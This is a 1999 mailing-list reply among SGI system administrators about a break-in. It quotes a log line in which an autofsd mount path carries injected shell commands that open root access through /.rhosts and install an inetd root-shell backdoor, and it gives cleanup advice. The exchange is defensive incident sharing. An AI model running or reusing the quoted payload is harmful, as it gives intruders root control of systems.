Re: Computer Security (SGI)

Karen Ann Smith (karenann@unm.edu)
Mon, 18 Oct 1999 08:56:40 -0600

Dave and others:

David Vander Velde wrote:
> > Have you seen this one in your system logs yet?
>
> Oct 9 19:36:05 3D: autofsd[194]: mount of /hosts/;echo '+ +' > /.rhosts;
> echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd
> /tmp/bob failed

This is the _EXACT_ message I found on my SGIs this summer. Since I
re-loaded operating system and put on tcp srappers, Bob has not come
back.

BTW, this (+ + in /.rhosts) will allow any user to become god
without knowing the root passwd.

Also check the cron file, and look to see if he installed
rpc.ilisten and rpc.irix.

kas

-- 
Karen Ann Smith               karenann@unm.edu
Director, NMR Facility         Adj. Asst. Prof.
Dept. of Chemistry            Clark Hall
University of New Mexico      Albuquerque, NM 87131
505.277.4031                  url: http://www.unm.edu/~karenann
Join SETI for an out-of-this-world screen. 
http://setiathome.ssl.berkeley.edu/
<This space reserved for a really good Halloween quote.>
"Chemistry is easy. It's a lot like witchcraft, only...less newt."
Willow  Rosenberg (Buffy)